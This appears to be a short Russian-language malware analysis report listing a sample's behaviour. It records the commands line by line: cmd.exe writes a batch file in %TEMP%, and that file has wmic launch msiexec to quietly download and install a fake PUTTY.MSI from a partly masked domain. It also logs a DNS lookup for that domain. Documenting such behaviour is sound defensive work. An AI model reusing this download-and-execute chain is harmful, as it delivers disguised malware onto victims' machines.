Техническая информация
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'ms">%temp%\XlIAx.bat&echo|set /p="iexec /i http://li#####buniversity.icu/PUTTY.MSI /q'" >> %temp%\XlIAx.bat&%temp%\XlIAx.bat>%temp%\XlIAx.txt
- %TEMP%\xliax.bat
- %TEMP%\xliax.txt
- DNS ASK li#####buniversity.icu
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'ms">%temp%\XlIAx.bat&echo|set /p="iexec /i http://li#####buniversity.icu/PUTTY.MSI /q'" >> %temp%\XlIAx.bat&%temp%\XlIAx.bat>%temp%\XlIAx.txt' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="wmic process call create 'ms" 1>%TEMP%\XlIAx.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="iexec /i http://li#####buniversity.icu/PUTTY.MSI /q'" 1>>%TEMP%\XlIAx.bat"
- '<SYSTEM32>\wbem\wmic.exe' process call create 'msiexec /i http://li#####buniversity.icu/PUTTY.MSI /q'
- '<SYSTEM32>\msiexec.exe' /i http://li#####buniversity.icu/PUTTY.MSI /q